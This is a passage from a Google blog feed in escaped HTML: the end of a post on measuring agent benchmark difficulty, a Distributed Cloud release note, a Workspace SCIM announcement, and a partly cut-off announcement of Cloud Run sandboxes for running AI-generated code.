&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;So we built the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;same&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; ambiguity sweep two ways: steering terms from a pure-LLM guess, versus terms grounded in &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/Tf%E2%80%93idf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;TF-IDF surprisal&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. The two disagreed violently. At high ambiguity, the LLM-built sweep scored the agent at F1 ≈ &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;0.34&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;; the grounded sweep, ≈ &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;0.85&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. One of these maps is badly distorted. The grounded one, predictably, is the more robust: surprisal gives it a footing the free-running LLM lacks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This is "evaluate your evals," made concrete. The information-theoretic lens does not only grade the agent along a continuous axis; it grades the &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;benchmark's own construction&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, and adjudicates between the two.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Evaluate your evals&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We have spent years optimizing agents against rulers we never measured. The bitter irony is that better models make this worse: as agents clear coarse benchmarks, the score saturates near the top and the exam loses its ability to highlight where the agent can be improved.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;So the call to action is uncomfortable and overdue: evaluate your evals. Read your ground truth. Treat difficulty as a measured quantity, not a label: sweep it, plot it, find the bit-width where your system breaks. Ask not just "did it pass?" but "how close was the miss, how hard was the pass, and would a slightly vaguer question have sent it off a cliff?" Build evaluations that produce signals; not just verdicts.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;There is a genuine tension to sit with here. Difficulty-as-entropy is only as reliable as the model that estimates the entropy. There's a risk that if we push too hard on a measurable proxy, we optimize the ruler instead of the agent. That is not a reason to retreat to pass/fail; it is a reason to keep the evaluator under the same scrutiny as what it is evaluating. The moment we stop asking who evaluates the evaluators is the moment our maps stop being useful again.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;1. Maia Polo, F. et al. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;tinyBenchmarks: Evaluating LLMs with Fewer Examples.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; ICML 2024. &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2402.14992" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;arxiv.org/abs/2402.14992&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/sup&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;2. Kipnis, A. et al. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;metabench: A Sparse Benchmark of Reasoning and Knowledge in Large Language Models.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; ICLR 2025. &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2407.12844" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;arxiv.org/abs/2407.12844&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/sup&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;3. Lost in Benchmarks? Rethinking Large Language Model Benchmarking with Item Response Theory&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; (PSN-IRT). AAAI 2026. &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2505.15055" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;arxiv.org/abs/2505.15055&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/sup&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;4. Gema, A. P. et al. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Are We Done with MMLU?&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; (MMLU-Redux). 2024. &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2406.04127" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;arxiv.org/abs/2406.04127&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/sup&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;5. Vendrow, J. et al. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Do Large Language Model Benchmarks Test Reliability?&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; (Platinum Benchmarks). 2025. &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2502.03461" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;arxiv.org/abs/2502.03461&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/sup&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;6. White, C., Dooley, S. et al. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;LiveBench: A Challenging, Contamination-Limited LLM Benchmark.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; 2024. &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2406.19314" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;arxiv.org/abs/2406.19314&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/sup&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;7. Min, S. et al. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AmbigQA: Answering Ambiguous Open-domain Questions.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; EMNLP 2020. &lt;/span&gt;&lt;a href="https://aclanthology.org/2020.emnlp-main.466/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;aclanthology.org/2020.emnlp-main.466&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/em&gt;&lt;/sup&gt;&lt;sup&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;8. Lai, E., Vitagliano, G. et al. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;KramaBench: A Benchmark for AI Systems on Data-to-Insight Pipelines over Data Lakes.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; 2025. &lt;/span&gt;&lt;a href="https://arxiv.org/abs/2506.06541" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;arxiv.org/abs/2506.06541&lt;/span&gt;&lt;/a&gt;&lt;/em&gt;&lt;/sup&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/evaluate-agent-performance" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-10T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_10_2026</id>
    <title>Cloud Release Notes — July 10, 2026</title>
    <updated>2026-07-10T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google Distributed Cloud (software only) for bare metal&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Google Distributed Cloud (software only) for bare metal 1.33.1000-gke.59 is now available for
download. To upgrade, see &lt;a href="how-to/upgrade"&gt;Upgrade clusters&lt;/a&gt;.
Google Distributed Cloud for bare metal
1.33.1000-gke.59 runs on Kubernetes v1.33.11-gke.100.&lt;/p&gt;
&lt;p&gt;After a release, it takes approximately 7 to 14 days for the version to become
available for installations or upgrades with the GKE On-Prem API clients: the
Google Cloud console, the gcloud CLI, and Terraform.&lt;/p&gt;
&lt;p&gt;If you use a third-party storage vendor, check the listing of our
previously-qualified &lt;a href="https://docs.cloud.google.com/kubernetes-engine/enterprise/docs/resources/partner-storage"&gt;storage partners&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;The following issues were fixed in 1.33.1000-gke.59:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fixed vulnerabilities listed in &lt;a href="https://docs.cloud.google.com/kubernetes-engine/distributed-cloud/bare-metal/docs/vulnerabilities"&gt;Vulnerability fixes&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Fixed an issue where Certificate Authority (CA) rotation failed for
self-managing clusters (admin, hybrid, and standalone). The failure occurs
during the final phase of the rotation when attempting to move management
resources back from the temporary bootstrap cluster to the self-managing
cluster, which can leave the cluster in an unmanageable state. You must
upgrade your clusters to version 1.33.1000-gke.59 before you rotate your CAs.
Running a CA rotation on self-managing clusters in versions prior to
1.33.1000-gke.59 triggers this issue and can disrupt your ability to manage
the cluster.
&lt;/li&gt;
&lt;/ul&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_10_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-10T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/streamline-identity-lifecycle-management-in-Google-Workspace-with-new-inbound-SCIM-support.html</id>
    <title>Streamline identity lifecycle management in Google Workspace with new inbound SCIM support</title>
    <updated>2026-07-09T17:09:34+00:00</updated>
    <content type="html">&lt;p&gt;We are excited to announce the general availability of Google Workspace inbound SCIM APIs to help IT administrators standardize identity lifecycle management. This new capability allows you to sync your Google Workspace directory in real time with any SCIM-compatible Identity Provider (IdP), HR system (HRIS), or custom application.&lt;/p&gt;&lt;p&gt;With inbound SCIM, when a Workspace end user’s account permissions are changed via their organization’s IdP, their access to Workspace data and any downstream apps, such as Gemini Enterprise, will also be updated in real time. Previously, customers would need to build custom integrations using Google directory APIs.&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;SCIM overview&lt;/h4&gt;&lt;p&gt;&lt;a href="https://datatracker.ietf.org/doc/html/rfc7644" target="_blank"&gt;System for Cross-domain Identity Management (SCIM)&lt;/a&gt; is an open protocol that synchronizes directory information between identity systems. With inbound SCIM, Google Workspace acts as a SCIM Service Provider, enabling compatible Identity Providers (IdPs) to automatically provision, update, and deactivate users and groups in real time.&lt;/p&gt;&lt;p&gt;Inbound SCIM offers:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Automated lifecycle management:&lt;/b&gt; IT teams no longer need to manually create user accounts or update details for Workspace, saving significant time and costs.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Seamless onboarding and day-one productivity: &lt;/b&gt;New employees have access to all Workspace productivity tools the moment they start, creating a frictionless onboarding experience.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enhanced security with instant deprovisioning:&lt;/b&gt; When an employee leaves your organization or changes roles, SCIM instantly pushes an update request to Workspace. This eliminates the security risks associated with orphaned accounts and makes compliance audits significantly easier.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Simplified admin experience: &lt;/b&gt;Inbound SCIM offers a one-click token generation experience and admin controls to lock synced groups from your external source to prevent manual changes in Workspace that would conflict with your identity provider.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; This feature will be available by default and can be disabled/enabled at the domain level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/p/inbound-scim-get-started" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; This is an admin-facing feature only.&lt;/li&gt;&lt;/ul&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRZjai4_pLmCws0nWKBWlLywUvyRalsT4yyEV6_GSYqwkR5jrbfa8rpLBHLbr4re21HMpT7_XfwG6eChYUajgjut0j8H8Xl07KZt9uwfaPKBSgInml5Tnn578THOdx2Lc5NCMGfpMYV3GMNRAzOv5i8XFZiIxIikAN1Vi7kAHbxfXfMyyvVH7P7bQzRJU/s2048/Streamline%20identity%20lifecycle%20management%20in%20Google%20Workspace%20with%20new%20inbound%20SCIM%20support%20-%205487%20-%201.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRZjai4_pLmCws0nWKBWlLywUvyRalsT4yyEV6_GSYqwkR5jrbfa8rpLBHLbr4re21HMpT7_XfwG6eChYUajgjut0j8H8Xl07KZt9uwfaPKBSgInml5Tnn578THOdx2Lc5NCMGfpMYV3GMNRAzOv5i8XFZiIxIikAN1Vi7kAHbxfXfMyyvVH7P7bQzRJU/s1600/Streamline%20identity%20lifecycle%20management%20in%20Google%20Workspace%20with%20new%20inbound%20SCIM%20support%20-%205487%20-%201.png" style="border: 2px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;The Manage external directories page in the Admin console showing Inbound SCIM setup&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp6yBrKUNP4VItoiOzn3aqXKvK5DMZUUdktjv7WK7HKWX4RdW6uyOWmSpawZWY1g1QY7OqTaAY63rffFAS-xsaOkkLntcQJSAzSw4_MBLX8tfchDslnLp5R9EKZs6_rVyBdlhsqevptpD11ampHlkkQzD8c6flzbTbxzmP8aodyCS_6eLKDgPem_6JRSo/s2048/Streamline%20identity%20lifecycle%20management%20in%20Google%20Workspace%20with%20new%20inbound%20SCIM%20support%20-%205487%20-%202.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp6yBrKUNP4VItoiOzn3aqXKvK5DMZUUdktjv7WK7HKWX4RdW6uyOWmSpawZWY1g1QY7OqTaAY63rffFAS-xsaOkkLntcQJSAzSw4_MBLX8tfchDslnLp5R9EKZs6_rVyBdlhsqevptpD11ampHlkkQzD8c6flzbTbxzmP8aodyCS_6eLKDgPem_6JRSo/s1600/Streamline%20identity%20lifecycle%20management%20in%20Google%20Workspace%20with%20new%20inbound%20SCIM%20support%20-%205487%20-%202.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;Configure a new Inbound SCIM connection with external IdP&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://knowledge.workspace.google.com/admin/releases/choose-when-users-get-new-features?visit_id=639180233279592651-2438693000&amp;amp;rd=1" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting July 9, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise:&lt;/b&gt; Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/p/inbound-scim-get-started" target="_blank"&gt;Get started with Inbound SCIM&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/streamline-identity-lifecycle-management-in-Google-Workspace-with-new-inbound-SCIM-support.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-09T17:09:34+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/sprawdz-jak-zwiekszamy-przejrzystosc-ai-w-reklamach</id>
    <title>Nowe funkcje przejrzystości AI w Google Ads</title>
    <updated>2026-07-09T17:00:00+00:00</updated>
    <content type="html">Obraz przedstawia graficzną ilustrację różnych okien przeglądarki i interfejsów cyfrowych z centralnie umieszczoną ikoną lupy.</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/sprawdz-jak-zwiekszamy-przejrzystosc-ai-w-reklamach" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-07-09T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-run-sandboxes-are-in-public-preview</id>
    <title>Safely run AI-generated code in Cloud Run sandboxes</title>
    <updated>2026-07-09T16:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s a question we hear often at Google Cloud: How do you safely run AI-generated code or untrusted binaries without putting your host application, data, and cloud credentials at risk? In other words, how do you give AI-written programs a safe space to run — one that keeps them completely separate from your trusted programs with higher privileges?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Until now, developers had to build complex sandboxing infrastructure using container clusters or pay for specialized third-party microVM runtimes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, at &lt;/span&gt;&lt;a href="https://www.wearedevelopers.com/world-congress" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WeAreDevelopers World Congress&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we are announcing Google Cloud Run sandboxes in public preview. Cloud Run sandboxes are a native, secure, and ultra-fast runtime environment built specifically for executing untrusted code and agent workloads, starting in milliseconds.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the following example, we send requests to safely execute untrusted Python code on a Cloud Run service that starts, executes, and stops 1,000 sandboxes with an average of 500ms latency:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="sandbox 1000 - 100 ok" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/sandbox_1000_-_100_ok.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this post, we’ll share more about the feature and core use cases.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What is a Cloud Run sandbox?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run sandboxes are lightweight, isolated execution boundaries that you can spawn near-instantly &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;within your existing Cloud Run service instances&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you need to let an LLM run a dynamically generated Python script to calculate business margins or spin up a headless browser to perform web research, Cloud Run sandboxes give you a secure, isolated sandbox to run these tasks without leaving your serverless environment.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="run_sandbox_arch" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/run_sandbox_arch.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Core use cases&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;LLM code interpreters:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Build advanced data analysis features into your AI products. Let your models write and execute Python, R, or SQL code to analyze datasets, generate charts, and perform complex math securely.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Headless browsers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Give your agents a secure environment to run browsers. Safely scrape web pages, take screenshots, and automate web workflows without risking your host machine.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;User-submitted code execution:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Beyond AI, platforms hosted on Cloud Run can use sandboxes to safely run custom scripts, plugins, or webhooks uploaded by their own end-users.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;How it works: The developer experience&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enabling sandboxes on your Cloud Run service is as simple as adding a single flag to your deployment.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Step 1: Enable the sandbox launcher&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When deploying your Cloud Run service, enable the sandbox launcher via &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;gcloud&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; or your YAML configuration:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud beta run deploy my-agent-service \\\r\n    --image=gcr.io/my-project/agent-image \\\r\n    --sandbox-launcher&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b49a27d00&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Step 2: Spawn a sandbox natively in your code&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once enabled, a lightweight &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;sandbox&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; CLI binary is automatically mounted into your execution environment. Your agent application can spawn sandboxes programmatically using standard subprocess calls.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here is how easily you can run an untrusted Python script generated by an LLM:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;import subprocess\r\n\r\ndef run_untrusted_code(llm_code: str):\r\n    # 1. Write the untrusted LLM code to a local file\r\n    with open(&amp;quot;/tmp/generated_script.py&amp;quot;, &amp;quot;w&amp;quot;) as f:\r\n        f.write(llm_code)\r\n        \r\n    # 2. Run it inside the secure sandbox\r\n    # The sandbox shares your container\&amp;#x27;s filesystem tools but runs in a secure silo\r\n    result = subprocess.run(\r\n        [&amp;quot;sandbox&amp;quot;, &amp;quot;do&amp;quot;, &amp;quot;--&amp;quot;, &amp;quot;python3&amp;quot;, &amp;quot;/tmp/generated_script.py&amp;quot;],\r\n        capture_output=True,\r\n        text=True,\r\n        timeout=10\r\n    )\r\n    \r\n    return result.stdout if result.returncode == 0 else result.stderr&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b49a27d30&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Security by design: Zero-trust by default&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run sandboxes are engineered to protect your host application and cloud resources from malicious or erroneous code execution. The runtime enforces three critical security boundaries:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Credential and environment isolation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; These sandboxes do not have access to the Cloud Run service’s environment variables nor do they have the ability to call the Google Cloud metadata server.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Locked-down network egress (deny-by-default):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; By default, sandboxes have &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;zero outbound network access&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. If your agent is tricked into running a script that attempts to exfiltrate data to a malicious server, the network request is blocked at the system layer. Egress can be enabled only when explicitly requested:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;sandbox do --allow-egress -- curl https://api.github.com&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b49a27df0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Safe filesystem overlay:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The sandbox runs with a read-only view of your container's filesystem (allowing it to use your installed packages, Python runtimes, and binaries) but writes all changes to an isolated, temporary memory overlay. Once the sandbox execution ends, all generated files are discarded. Though you can still import and export files as needed for re-use across sandboxes:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
